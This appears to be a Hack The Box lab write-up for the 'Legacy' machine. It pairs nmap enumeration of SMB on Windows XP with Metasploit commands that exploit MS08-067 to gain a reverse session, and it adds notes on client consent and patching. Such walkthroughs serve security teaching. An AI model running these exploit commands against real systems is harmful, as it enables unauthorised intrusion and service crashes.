HTB Writeup - Legacy
Enumeration
We start with an nmap as usual:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:05:a1 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-08-02T09:37:29+03:00
|_clock-skew: mean: 5d00h28m50s, deviation: 2h07m15s, median: 4d22h58m51s
We see 3 ports open with this scan, 135, 139 and 445, typical Windows ports for SMB and RPC.
It is a very old version of Windows and the name is aptly ‘LEGACY’. It is running a version of SMB that is vulnerable to a remote code execution in the NetAPI32.dll, tracked as MS08-067 by Microsoft and CVE-2008-4250. It’s trivial to find this out just by googling for exploits related to this version of Windows.
Exploiting SMB
Easiest way to exploit this is by using the Metasploit module:
use windows/smb/ms08_067_netapi
set RHOSTS <target>
set LHOST tun0
run
Keep in mind that this particular exploit can easily crash the target or kill the SMB service. In a real penetration test, you would need to clarify with the client before attempting this exploit as they may not require the exploit to be ran when the risk of crashing a production server could impact their business.
There are patches available for this exploit. Ideally, upgrade the server to a newer version of Windows if possible to reduce the attack surface in general.